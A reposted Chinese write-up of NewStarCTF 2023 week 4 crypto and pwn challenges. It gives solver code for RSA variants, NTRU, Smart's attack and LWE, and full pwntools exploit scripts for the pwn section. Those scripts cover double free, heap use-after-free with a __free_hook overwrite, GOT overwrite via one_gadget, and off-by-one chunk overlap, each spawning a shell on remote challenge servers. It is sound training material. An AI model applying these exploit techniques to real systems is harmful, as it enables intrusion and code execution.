[BUUCTF NewStarCTF 2023 公开赛道] week4 crypto/pwn

这篇具有很好参考价值的文章主要介绍了[BUUCTF NewStarCTF 2023 公开赛道] week4 crypto/pwn。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

再补完这个就基本上完了.

crypto

RSA Variation II

Schmidt-Samoa密码系统看上去很像RSA,其中N=pqq, 给的e=N给了d

from secret import flag
from Crypto.Util.number import *

p = getPrime(1024)
q = getPrime(1024)

N = p*p*q

d= inverse(N, (p-1)*(q-1)//GCD(p-1, q-1))

m = bytes_to_long(flag)

c = pow(m, N, N)

print('c =', c)
print('N =', N)
print('d =', d)

c = 1653396627113549535760516503668455111392369905404419847336187180051939350514408518095369852411718553340156505246372037811032919080426885042549723125598742783778413642221563616358386699697645814225855089454045984443096447166740882693228043505960011332616740785976743150624114653594631779427044055729185392854961786323215146318588164139423925400772680226861699990332420246447180631417523181196631188540323779487858453719444807515638025771586275969579201806909799448813112034867089866513864971414742370516244653259347267231436131850871346106316007958256749016599758599549180907260093080500469394473142003147643172770078092713912200110043214435078277125844112816260967490086038358669788006182833272351526796228536135638071670829206746835346784997437044707950580087067666459222916040902038574157577881880027391425763503693184264104932693985833980182986816664377018507487697769866530103927375926578569947076633923873193100147751463
N = 1768427447158131856514034889456397424027937796617829756303525705316152314769129050888899742667986532346611229157207778487065194513722005516611969754197481310330149721054855689646133721600838194741123290410384315980339516947257172981002480414254023253269098539962527834174781356657779988761754582343096332391763560921491414520707112852896782970123018263505426447126195645371941116395659369152654368118569516482251442513192892626222576419747048343942947570016045016127917578272819812760632788343321742583353340158009324794626006731057267603803701663256706597904789047060978427573361035171008822467120148227698893238773305320215769410594974360573727150122036666987718934166622785421464647946084162895084248352643721808444370307254417501852264572985908550839933862563001186477021313236113690793843893640190378131373214104044465633483953616402680853776480712599669132572907096151664916118185486737463253559093537311036517461749439
d = 20650646933118544225095544552373007455928574480175801658168105227037950105642248948645762488881219576174131624593293487325329703919313156659700002234392400636474610143032745113473842675857323774566945229148664969659797779146488402588937762391470971617163496433008501858907585683428652637958844902909796849080799141999490231877378863244093900363251415972834146031490928923962271054053278056347181254936750536280638321211545167520935870220829786490686826062142415755063724639110568511969041175019898031990455911525941036727091961083201123910761290998968240338217895275414072475701909497518616112236380389851984377079

#-------------------------------------
#Schmidt-Samoa密码系统
pq = gcd(pow(2,d*N,N)-2,N)

m = pow(c,d,pq)
print(n2s(m))
#flag{l3arn_s0m3_e1ement4ry_numb3r_the0ry}

babyNTRU

NTRU又一个格的基本应用

from secret import flag
from Crypto.Util.number import *

q = getPrime(2048)

f = getPrime(1024)
g = getPrime(768)

h = (inverse(f, q) * g) % q

m = bytes_to_long(flag)

e = (getPrime(32) * h + m) % q

print((h, q))
print(e)

h,p = (8916452722821418463248726825721257021744194286874706915832444631771596616116491775091473142798867278598586482678387668986764461265131119164500473719939894343163496325556340181429675937641495981353857724627081847304246987074303722642172988864138967404024201246050387152854001746763104417773214408906879366958729744259612777257542351501592019483745621824894790096639205771421560295175633152877667720038396154571697861326821483170835238092879747297506606983322890706220824261581533324824858599082611886026668788577757970984892292609271082176311433507931993672945925883985629311514143607457603297458439759594085898425992, 31985842636498685945330905726539498901443694955736332073639744466389039373143618920511122288844282849407290205804991634167816417468703459229138891348115191921395278336695684210437130681337971686008048054340499654721317721241239990701099685207253476642931586563363638141636011941268962999641130263828151538489139254625099330199557503153680089387538863574480134898211311252227463870838947777479309928195791241005127445821671684607237706849308372923372795573732000365072815112119533702614620325238183899266147682193892866330678076925199674554569018103164228278742151778832319406135513140669049734660019551179692615505961)
c = 20041713613876382007969284056698149007154248857420752520496829246324512197188211029665990713599667984019715503486507126224558092176392282486689347953069815123212779090783909545244160318938357529307482025697769394114967028564546355310883670462197528011181768588878447856875173263800885048676190978206851268887445527785387532167370943745180538168965461612097037041570912365648125449804109299630958840398397721916860876687808474004391843869813396858468730877627733234832744328768443830669469345926766882446378765847334421595034470639171397587395341977453536859946410431252287203312913117023084978959318406160721042580688
'''
h = g*f^-1 (mod p)  ==>  fh = g (mod p)
c = r*h + m (mod p) ==> cf = rg +mf

   | 1  h |
   | 0  p |
   
'''
v1 = vector(ZZ, [1, h])
v2 = vector(ZZ, [0, p])
m = matrix([v1,v2]);

# Solve SVP.  f*h = g (mod p) 求f,g
shortest_vector = m.LLL()[0]
# shortest_vector = GaussLatticeReduction(v1, v2)[0]
f, g = shortest_vector
print(f, g)

# Decrypt.
mf = f*c % p % g
m = mf * inverse_mod(f, g) % g
print(bytes.fromhex(hex(m)[2:]))
#flag{Lattice_reduction_magic_on_NTRU#82b08b2d}

 

Smart

当E.order() == p时

from Crypto.Util.number import *
from sage.all import *
from secret import flag

p = 75206427479775622966537995406541077245842499523456803092204668034148875719001
a = 40399280641537685263236367744605671534251002649301968428998107181223348036480
b = 34830673418515139976377184302022321848201537906033092355749226925568830384464

E = EllipticCurve(GF(p), [a, b])

d = bytes_to_long(flag)

G = E.random_element()

P = d * G

print(G)
print(P)

# (63199291976729017585116731422181573663076311513240158412108878460234764025898 : 11977959928854309700611217102917186587242105343137383979364679606977824228558 : 1)
# (75017275378438543246214954287362349176908042127439117734318700769768512624429 : 39521483276009738115474714281626894361123804837783117725653243818498259351984 : 1)
G = (63199291976729017585116731422181573663076311513240158412108878460234764025898 , 11977959928854309700611217102917186587242105343137383979364679606977824228558)
P = (75017275378438543246214954287362349176908042127439117734318700769768512624429 , 39521483276009738115474714281626894361123804837783117725653243818498259351984)
G = E(G)
P = E(P)

#E.order() == p 
m = SmartAttack(G,P,p)
from Crypto.Util.number import long_to_bytes
long_to_bytes(int(m))
b'flag{m1nd_y0ur_p4rameter#167d}'

 

signin

p-1光滑时的分解

from Crypto.Util.number import isPrime,bytes_to_long, sieve_base
from random import choice
from secret import flag
 
m=bytes_to_long(flag)
def uniPrime(bits):
    while True:
        n = 2
        while n.bit_length() < bits:
            n *= choice(sieve_base)
        if isPrime(n + 1):
            return n + 1
 
 
p=uniPrime(512)
q=uniPrime(512)
n=p*q
e= 196608
c=pow(m,e,n)
 
print("n=",n)
print("c=",c)
 

n= 3326716005321175474866311915397401254111950808705576293932345690533263108414883877530294339294274914837424580618375346509555627578734883357652996005817766370804842161603027636393776079113035745495508839749006773483720698066943577445977551268093247748313691392265332970992500440422951173889419377779135952537088733
c= 2709336316075650177079376244796188132561250459751152184677022745551914544884517324887652368450635995644019212878543745475885906864265559139379903049221765159852922264140740839538366147411533242116915892792672736321879694956051586399594206293685750573633107354109784921229088063124404073840557026747056910514218246

此题先是p-1光滑分解,然后是e=3*0x10000先求3次根再用rabin求16次 

#p-1光滑
N = n
a = 2
n = 2
while True:
    a = pow(a, n, N)
    res = gcd(a-1, N)
    if res != 1 and res != N:
        q1 = N // res
        p1 = res
        print(p1)
        print(q1)
        break
    n += 1

p = 11104262127139631006017377403513327506789883414594983803879501935187577746510780983414313264114974863256190649020310407750155332724309172387489473534782137699
q =299589109769881744982450090354913727490614194294955470269590615599558785111624291036465332556249607131912597764625231248581361283506625311199114064303807167
phi = (p-1)*(q-1)
d = invert(3,phi)
mm = pow(c,d,n)
#e = 3*0x10000
#再对mm开0x10000
x0=invert(p,q)
x1=invert(q,p)
cs = [mm]
for i in range(16):
    ms = []
    for c2 in cs:
        r = pow(c2, (p + 1) // 4, p)
        s = pow(c2, (q + 1) // 4, q)
        x = (r * x1 * q + s * x0 * p) % n
        y = (r * x1 * q - s * x0 * p) % n
        if x not in ms:
            ms.append(x)
        if n - x not in ms:
            ms.append(n - x)
        if y not in ms:
            ms.append(y)
        if n - y not in ms:
            ms.append(n - y)
    cs = ms

for m in ms:
    flag = long_to_bytes(m)
    print(flag)
#flag{new1sstar_welcome_you}

 

error

求误差,虽然被分成3个数组,但本质上是一个,可以连到一起求解. 

对于总是 B = A*x + e 可以先用格求出B-e再用矩阵求x

from sage.all import *
from secret import flag
import random
data = [ord(x) for x in flag]

mod = 0x42
n = 200
p = 5
q = 2**20

def E():
  return vector(ZZ, [1 - random.randint(0,p) for _ in range(n)])

def creatematrix():
  return matrix(ZZ, [[q//2 - random.randint(0,q) for _ in range(n)] for _ in range(mod)])

A, B, C= creatematrix(), creatematrix(), creatematrix()
x = vector(ZZ, data[0:mod])
y = vector(ZZ, data[mod:2*mod])
z = vector(ZZ, data[2*mod:3*mod])
e = E()
b = x*B+y*A+z*C + e
res = ""
res += "A=" + str(A) +'\n'
res += "B=" + str(B) +'\n'
res += "C=" + str(C) +'\n'
res += "b=" + str(b) +'\n'

with open("enc.out","w") as f:
  f.write(res)
#b = v*M + e 
M = matrix(ZZ,mod*3+1,n+1)
for i in range(mod):
    for j in range(n):
        M[i,j] = A[i][j]
        M[i+mod,j] = B[i][j]
        M[i+2*mod,j] = B[i][j]
        
for i in range(n):
    M[-1,i] = b[i]
M[-1,-1] = 1

s = M.LLL()
for v in s:
    if v[0] == 0 or v[-1]!=0: continue
    flag = M.solve_left(v)
    print(bytes([i for i in flag]))

 

PWN

Double

double 释放同一个块两次,在建第3次的时候会使用第1次写入的指针,达到任意地址写

from pwn import *

#p = process('./Double')
p = remote('node4.buuoj.cn', 26153)
context(arch='amd64', log_level='debug')

def add(idx, msg):
    p.sendlineafter(b">", b'1')
    p.sendlineafter(b"Input idx\n", str(idx).encode())
    p.sendafter(b"Input content", msg)

def free(idx):
    p.sendlineafter(b">", b'2')
    p.sendlineafter(b"Input idx\n", str(idx).encode())

'''
0x602060 <check_num>:   0x0000000000000000      0x0000000000000031
0x602070 <check_num+16>:        0x0000000000000000      0x0000000000000000
0x602080 <check_num+32>:        0x0000000000000000      0x0000000000000000
'''
add(0, b'A')
add(1, b'A')
free(0)
free(1)
free(0)
add(2,p64(0x602060))
add(3,b'A')
add(4,b'A')
add(5,p64(0x666))

p.sendlineafter(b">", b'3')

p.interactive()

game

[BUUCTF NewStarCTF 2023 公开赛道] week4 crypto/pwn,python,开发语言

每次+0x10000,计算到一个偏移让puts-v3-v7 == system,这里有个小坑,+0x10000 四次可以得到system,但是再加v3的时候,由于v3是短整形,不足以变成system,不过system泄露对咱们来说没用,可以通过libc得到,如果不给libc还可以通过一次失败得到相应版本,相出相对偏移就行,不需要泄露.

from pwn import *

libc = ELF('./libc-2.31.so')

#p = process('./game')
p = remote('node4.buuoj.cn', 26601)
context(arch='amd64', log_level='debug')

#gdb.attach(p, "b*0x5555555554dd\nc")

p.sendlineafter("请选择你的伙伴\n".encode(), b'1')
p.sendlineafter("2.扣2送kfc联名套餐\n".encode(), b'2')
p.sendafter("你有什么想对肯德基爷爷说的吗?\n".encode(), b'/bin/sh\x00')  #v6=0

for i in range(3):
    p.sendlineafter("2.扣2送kfc联名套餐\n".encode(), b'1')

p.sendlineafter("2.扣2送kfc联名套餐\n".encode(), b'3')
#v3 = libc.sym['puts'] - libc.sym['system'] - 0x40000
#print(f"{v3:x}")
p.sendlineafter(b"you are good mihoyo player!", b'-56944')
p.sendline(b'cat flag')
p.interactive()

 

ezheap

[BUUCTF NewStarCTF 2023 公开赛道] week4 crypto/pwn,python,开发语言

有管理块,管理块上有指针指向数据块.在释放时只释放管理块并不清理指针可以UAF,由于管理块固定0x30所以不能直接释放得到main_arena,由于有UAF可以先释放两个块,再建与管理块相同的数据块会占用原管理块位置控制原管理块的指针,达到任意地址写

 先修改一个头为441释放到unsort(libc-2.31在释放的时候会检查尾部是否合法,所以要弄个0x31+0x411的结构)然后再将这个指针指到__free_hook将system写到上边再释放写着/bin/sh的块

from pwn import *

libc = ELF('./libc-2.31.so')

#p = process('./ezheap')
p = remote('node4.buuoj.cn', 28508)
context(arch='amd64', log_level='debug')

def add(idx, size, msg=b'A'):
    p.sendlineafter(b">>", b'1')
    p.sendlineafter(b"enter idx(0~15): \n", str(idx).encode())
    p.sendlineafter(b"enter size: \n", str(size).encode())
    p.sendlineafter(b"write the note: \n", msg)

def free(idx):
    p.sendlineafter(b">>", b'2')
    p.sendlineafter(b"enter idx(0~15): \n", str(idx).encode())

def show(idx):
    p.sendlineafter(b">>", b'3')
    p.sendlineafter(b"enter idx(0~15): \n", str(idx).encode())

def edit(idx, msg):
    p.sendlineafter(b">>", b'4')
    p.sendlineafter(b"enter idx(0~15): \n", str(idx).encode())
    p.sendlineafter(b"enter content: \n", msg)

add(0, 0x400)
add(1, 0x50)
add(2, 0x50)
add(3, 0x50)

free(3)
free(1)
free(2)
add(4, 0x20) # 4=2->1

show(4)
stack = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x841
print(f"{ stack = :x}")

edit(4, flat(0x50,0,0, stack+0x290))
edit(1, flat(0, 0x441))
free(0)

edit(4, flat(0x50,0,0, stack+0x2a0))
show(1)
libc.address = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x70 - libc.sym['__malloc_hook']
print(f"{ libc.address = :x}")

edit(4, flat(0x50,0,0, libc.sym['__free_hook']))
edit(1, p64(libc.sym['system']))
edit(4, b'/bin/sh\x00')

free(1)
p.interactive()

#gdb.attach(p)
#pause()

message_board

在board里用-绕过,将栈内残留泄露出来,利用指针前溢出,往got[exit]里写one_gadget

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+24h] [rbp-Ch] BYREF
  int v4; // [rsp+28h] [rbp-8h] BYREF
  int i; // [rsp+2Ch] [rbp-4h]

  init(argc, argv, envp);
  board();
  for ( i = 0; i <= 1; ++i )
  {
    puts("You can modify your suggestions");
    __isoc99_scanf("%d", &v4);
    puts("input new suggestion");
    __isoc99_scanf("%d", &v3);
    a[v4] = v3;
  }
  exit(0);
}


int (**board())(const char *s)
{
  int (**result)(const char *); // rax
  int v1; // [rsp+4h] [rbp-9Ch] BYREF
  __int64 v2[18]; // [rsp+8h] [rbp-98h] BYREF
  int i; // [rsp+9Ch] [rbp-4h]

  puts("Do you have any suggestions for us");
  __isoc99_scanf("%d", &v1);
  if ( v1 > 15 )
  {
    puts("no!");
    exit(0);
  }
  for ( i = 0; i < v1; ++i )
  {
    __isoc99_scanf("%ld", &v2[i + 1]);
    printf("Your suggestion is %ld\n", v2[i + 1]);
  }
  puts("Now please enter the verification code");
  __isoc99_scanf("%ld", v2);
  result = &puts;
  if ( (int (**)(const char *))v2[0] != &puts )
    exit(0);
  return result;
}
from pwn import *

#p = process('./pwn')
p = remote('node4.buuoj.cn', 25541)
context(arch='amd64', log_level='debug')

elf = ELF('./pwn')
libc = ELF('./libc-2.31.so')

#gdb.attach(p, "b*0x401399\nc")

p.sendlineafter(b"Do you have any suggestions for us\n", b'2')
p.sendline(b'-')
p.recvline()

p.sendline(b'-')
libc.address = int(p.recvline().strip().split(b' ')[-1]) - libc.sym['_IO_2_1_stderr_']
print(f"{ libc.address = :x}")

p.sendlineafter(b'Now please enter the verification code\n', str(libc.sym['puts']).encode())

one = [0xe3afe, 0xe3b01, 0xe3b04]

o = p64(libc.address + one[1])
print(o.hex())
o1 = u32(o[:4])
o2 = u32(o[4:])
p.sendlineafter(b"You can modify your suggestions", str(-28).encode())
p.sendlineafter(b"input new suggestion", str(o1).encode())

p.sendlineafter(b"You can modify your suggestions", str(-27).encode())
p.sendlineafter(b"input new suggestion", str(o2).encode())


p.interactive()

 

god_of_change

add有个off_by_one,由于只能溢出1字节,可先修改大一个,再用这个修改后边的块

[BUUCTF NewStarCTF 2023 公开赛道] week4 crypto/pwn,python,开发语言

建 20,20,40,80*8,80 用0修改1为61(包含2)再用1修改2为441就可以和后边的8个80组成440释放得到libc,再通过这个重叠块改tcache指针到__free_hook写system

from pwn import *

libc = ELF('./libc-2.31.so')

#p = process('./god')
p = remote('node4.buuoj.cn', 28025)
context(arch='amd64', log_level='debug')

def add(size, msg=b'A'):
    p.sendlineafter(b"Your Choice: ", b'1')
    p.sendlineafter(b"size: ", str(size).encode())
    p.sendafter(b"the content: \n", msg)

def free(idx):
    p.sendlineafter(b"Your Choice: ", b'3')
    p.sendlineafter(b"idx: ", str(idx).encode())

def show(idx):
    p.sendlineafter(b"Your Choice: ", b'2')
    p.sendlineafter(b"idx: \n", str(idx).encode())
    p.recvline()

add(0x18)
add(0x18)
add(0x38)
for i in range(9):
    add(0x78)

free(0)
add(0x18, b'\x00'*0x18 + p8(0x61))
free(1)
add(0x58, flat(0,0,0, 0x441))

free(2)
add(0x38)

show(3)
libc.address = u64(p.recvuntil(b'\x7f').ljust(8, b'\x00')) - 0x70 - libc.sym['__malloc_hook']
print(f"{libc.address = :x}")

add(0x38) 
free(3)
free(2)
free(1)
add(0x58, flat(b'/bin/sh\x00',0,0,0x41, libc.sym['__free_hook']))

add(0x38)
add(0x38, p64(libc.sym['system']))

free(1)
p.interactive()

 文章来源地址https://www.toymoban.com/news/detail-722653.html

到了这里,关于[BUUCTF NewStarCTF 2023 公开赛道] week4 crypto/pwn的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [BUUCTF NewStar 2023] week5 Crypto/pwn

    最后一周几个有难度的题 也是个板子题,不过有些人存的板子没到,所以感觉有难度,毕竟这板子也不是咱自己能写出来的。 给了部分p, p是1024位给了922-101位差两头。 直接用双值copper这个双值和多值还是有些区别的,应该是作了些优化。 这个题有9个人完成,我估计有一半

    2024年02月05日
    浏览(42)
  • NewStarCTF2023week4-midsql(利用二分查找实现时间盲注攻击)

    大致测试一下,发现空格被过滤了 使用内联注释/**/绕过,可行 使用%a0替代空格,也可以  再次测试发现等号也被过滤,我们使用 like 代替 (我最开始以为是and被过滤,并没有,如果是and或者or被过滤我们也可以使用 和 || 替代) 但是这里尝试了很多都只返回一个页面,没有

    2024年02月07日
    浏览(47)
  • FSCTF 2023(公开赛道)CRYPTO WP

    1、题目信息 2、解题方法 exp 1、题目信息 2、解题方法 阴阳怪气密码解码 1、题目信息 2、解题方法 1、题目信息 2、解题方法 dp泄露 exp 1、题目信息 2、解题方法 exp1:维纳攻击1 exp2: 维纳攻击2 1、题目信息 2、题目信息 共e攻击 1、题目信息 2、解题方法 cyber一把梭 1、题目信

    2024年02月08日
    浏览(48)
  • BUUCTF NewStarCTF 2023 WEB题WP

    直接在URL处访问www.zip文件 将下载下来的www.zip文件解压即可得到flag 常见的文件泄露一般泄露的都是网站的备份文件,常见的备份的文件名通常为 wwwroot、www、子域名等,压缩包后缀通常为 zip、tar.gz 等 其他的也有配置文件的泄露。建议自己收集一个敏感文件的字典 很简单的

    2024年02月08日
    浏览(45)
  • HGame 2023 Week4 部分Writeup

    文章同时发布于我的博客:https://blog.vvbbnn00.cn/archives/hgame2023week4-bu-fen-writeup 第四周的比赛难度较高,同时也出现了不少颇为有趣的题目。可惜笔者比较菜,做出来的题目数量并不是很多,不过里面确实有几道题值得好好讲讲。不多废话了,抓紧端上来吧(喜)。 注:本周C

    2024年02月03日
    浏览(49)
  • [wp]NewStarCTF 2023 WEEK1|WEB

    考的就是敏感信息的泄露 题目提示两个  无非就最简单的三种 1.robots.txt 2.www.zip 3.index.php.swp 当然我的做法就是直接用dirsearch扫描了 得到了robots.txt和www.zip文件,访问拼接就得到了flag了   考的就是绕过客户端 JavaScript检验 上传一句话木马修改文件名后缀就行了 一句话木马内

    2024年02月07日
    浏览(38)
  • [wp]NewStarCTF 2023 WEEK3|WEB

    medium_sql Sqlmap一把梭 (部分能直接 flag\\\' 部分出现flag不完整 或者部分爆不到表 等官方wp) 在week1的基础上,多过滤了union。 验证存在布尔盲注: ?id=TMP0919\\\' And if(10,1,0)# ?id=TMP0919\\\' And if(01,1,0)# 发第一个,有回显,第二个,没回显,说明页面可以根据if判断的结果回显两种(真假)

    2024年02月08日
    浏览(34)
  • FSCTF 2023(公开赛道) MISC(复盘) WP

    2024年02月08日
    浏览(289)
  • 【2023NewStar】#Week1 Web和Crypto 全题解!涉及知识扩展~

    泄露的秘密 www.zip Begin of Upload 打开源码 找到限制是在前端 我们抓包 上传正常后缀的文件 比如jpg结尾 但是这样传上去服务器是无法解析的 所以我们进行抓包 然后在bp中修改后缀名 将我们上传的后缀jpg在请求包中改为php 服务器就可以解析我们的语句了 一句话木马: ?php eval

    2024年02月06日
    浏览(49)
  • 2023年SWPU NSS 秋季招新赛 (校外赛道)WP—Crypto

    题目信息 根据第一行新表base64解码即可 题目附件 基础RSA exp: 题目附件 典型的dp泄露 exp: 提示 p/q接近类型 附件信息 exp: 附件信息 题目提示 RSA多项式问题,构造多项式环,sage解 得到x后,直接解 附件信息 兔子流密码(无key型)+栅栏+base,好好好 题目提示 附件信息 有密码,

    2024年02月08日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包